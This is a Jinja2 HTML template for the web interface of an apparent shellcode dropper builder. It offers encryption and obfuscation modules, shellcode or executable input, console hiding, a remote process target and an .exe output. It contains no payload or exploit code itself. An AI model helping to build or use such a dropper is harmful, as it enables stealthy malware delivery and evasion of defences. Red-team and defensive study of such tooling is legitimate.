{% extends "base.html" %}

{% block content %}
<script type="text/javascript" src="{{ url_for('static', filename='js/event-handlers.js') }}"></script>
<script type="text/javascript" src="{{ url_for('static', filename='js/form-utils.js') }}"></script>
<script>const precompiledExecutablesData = {{ precompiled_executables|safe }};</script>

<form method="POST" action="{{ url_for('build') }}" enctype="multipart/form-data">
    <div class="row">
        <div class="col-md-6">
            <div class="card text-white mb-4">
                <div class="card-body">
                    <h5 class="card-title text-primary fw-bold">Modules Selection</h5>
                    {% for section, modules in modules.items() %}
                        <p class="text-primary h5 fw-semibold  mt-4 mb-3">{{ section.replace('_', ' ').title() }}</p>
                        {% if 'encryption' in section or 'obfuscation' in section %}
                            <select class="form-select fw-medium" name="{{ section }}" aria-label="Choose an algorithm">
                                <option class="selected" id="no_alg" value="">Cleartext</option>
                                {% for module in modules %}
                                    <option
                                        class="select-item"
                                        id="{{ module.name.replace(' ', '_') }}"
                                        value="{{ module.flags }}"
                                    >
                                        {{ module.name }}
                                    </option>
                                {% endfor %}
                            </select>
                        {% else %}
                            {% for module in modules %}
                                <div class="form-check">
                                    <input
                                        class="form-check-input" type="checkbox" name="{{ section }}" id="{{ module.name.replace(' ', '_') }}" 
                                        value="{{ module.flags }}" onchange="toggleTextBox('{{ module.name.replace(' ', '_') }}')"
                                    >
                                    <label class="form-check-label fw-medium" for="{{ module.name.replace(' ', '_') }}">
                                        {{ module.name }}
                                        <i class="fas fa-info-circle text-primary" data-bs-toggle="tooltip" data-bs-placement="right" title="{{ module.brief }}"></i>
                                    </label>
                                </div>
                            {% endfor %}
                        {% endif %}
                    {% endfor %}
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="card">
                <div class="card-body text-white">
                    <h5 class="text-primary fw-bold">Shellcode Input</h5>
                    <div class="tab-slider">
                        <div class="tab-option px-2 active" id="file-tab" data-bs-toggle="tab" data-bs-target="#file-shellcode">
                            <i class="fas fa-upload"></i>
                            File Upload
                        </div>
                        <div class="tab-option px-2" id="text-tab" data-bs-toggle="tab" data-bs-target="#text-shellcode">
                            <i class="fas fa-code"></i>
                            Manual Input
                        </div>
                        <div class="tab-option px-2" id="executables-tab" data-bs-toggle="tab" data-bs-target="#executable">
                            <span class="iconify fs-5" data-icon="lucide:file-search"></span>
                            Executables
                        </div>
                        <div class="tab-slider-bg"></div>
                    </div>
                    <div class="tab-content">
                        <div class="tab-pane fade show active" id="file-shellcode">
                            <div class="upload-area mt-3" id="drop-zone">
                                <i class="fa-solid fa-upload upload-icon text-secondary"></i>
                                <p class="mt-2">Drag and drop your file here</p>
                                <p class="small">or</p>
                                <button type="button" class="btn btn-primary btn-upload" onclick="document.getElementById('file-input').click()">
                                    <i class="fas fa-folder-open"></i>
                                    Browse Files
                                </button>
                                <input type="file" id="file-input" class="hidden-input d-none" accept=".bin,.exe,.raw" name="shellcode">
                            </div>
                            
                            <!-- File Preview Section -->
                            <div id="file-preview" class="mt-3 card-box text-white d-none">
                                <div class="d-flex align-items-center justify-content-between">
                                    <!-- File Icon & Details -->
                                    <div class="d-flex align-items-center">
                                        <div class="icon-wrapper">
                                            <i class="fa-solid fa-file-code fa-xl text-primary"></i>
                                        </div>
                                        <div>
                                            <p class="mb-0 fw-semibold" id="file-name"></p>
                                            <p class="mb-0 small text-muted" id="file-size"></p>
                                        </div>
                                    </div>
                            
                                    <!-- Close Button -->
                                    <button type="button" id="remove-file-btn" class="btn btn-sm btn-link text-danger p-0 ms-3" aria-label="Remove file">
                                        <i class="fa-solid fa-xmark fa-2xl text-danger"></i>
                                    </button>
                                </div>
                            </div>

                            <!-- Arguments Section  -->
                            <div class="input-group mt-3">
                                <span class="input-group-text input-group-text-start" id="file-upload-arguments">Arguments</span>
                                <input type="text" class="form-control" placeholder="" name="execution_arguments" aria-label="execution_arguments" aria-describedby="file-upload-arguments">
                            </div>
                        </div>
                        <div class="tab-pane fade mt-3" id="text-shellcode">
                            <textarea id="textarea-shellcode" class="form-control" name="shellcode_text" placeholder="Enter hexadecimal shellcode..." rows="10"></textarea>
                        </div>
                        <div class="tab-pane fade mt-3" id="executable">
                            <div class="position-relative">
                                <div class="custom-search-bar mt-3">
                                    <i class="fas fa-search ms-2 text-primary"></i>
                                    <input
                                        type="text"
                                        class="form-control"
                                        id="autocompleteInput"
                                        placeholder="Search..."
                                        autocomplete="off"
                                    />
                                    <input
                                        type="hidden"
                                        id="autocompleteValue"
                                        name="executable"
                                        value=""
                                    />
                                </div>
                                <ul
                                    class="dropdown-menu w-100"
                                    id="autocompleteDropdown"
                                ></ul>
                            </div>
                            <!-- Arguments Section  -->
                            <div class="input-group mt-3">
                                <span class="input-group-text input-group-text-start"  id="executable-arguments">Arguments</span>
                                <input type="text" class="form-control" name="execution_arguments" placeholder="" aria-label="execution_arguments" aria-describedby="executable-arguments">
                            </div>
                        </div>
                    </div>

                    <h5 class="text-primary fw-bold mt-4 mb-3">Options</h5>
                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="debug" id="debug" value="debug">
                        <label class="form-check-label" for="debug">
                            Enable Debug mode
                            <i class="fas fa-info-circle text-primary" data-bs-toggle="tooltip" data-bs-placement="top" title="Enable debug mode to see more information about the dropper execution."></i>
                        </label>
                    </div>
                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="hide_console" id="hide_console" value="hide_console">
                        <label class="form-check-label" for="hide_console">
                            Hide Console
                            <i class="fas fa-info-circle text-primary" data-bs-toggle="tooltip" data-bs-placement="top" title="Hide the console window when the dropper is executed."></i>
                        </label>
                    </div>
                    <div id="textbox_remote_process" class="input-group mb-3">
                        <input type="text" class="form-control" name="process_name" placeholder="Target Remote Process Name" aria-label="Process Name" aria-describedby="basic-addon2">
                        <span class="input-group-text input-group-text-end" id="basic-addon2">.exe</span>
                    </div>

                    <h5 class="text-primary fw-bold mt-4 mb-3">Output Settings</h5>
                    <div class="row">
                        <div class="col-md-9">
                            <input type="text" class="form-control" name="filename" placeholder="Filename...">
                        </div>
                        <div class="col-md-3">
                            <select class="form-select text-primary" name="file_extension">
                                <option>.exe</option>
                                <option disabled>.dll</option>
                                <option disabled>.msi</option>
                            </select>
                        </div>
                    </div>
                </div>
            </div>
            <button type="submit" class="w-50 mx-auto btn btn-primary btn-block mt-5">
                <i class="fa-regular fa-rocket"></i> Build Dropper
            </button>
        </div>
    </div>
</form>
{% endblock %}
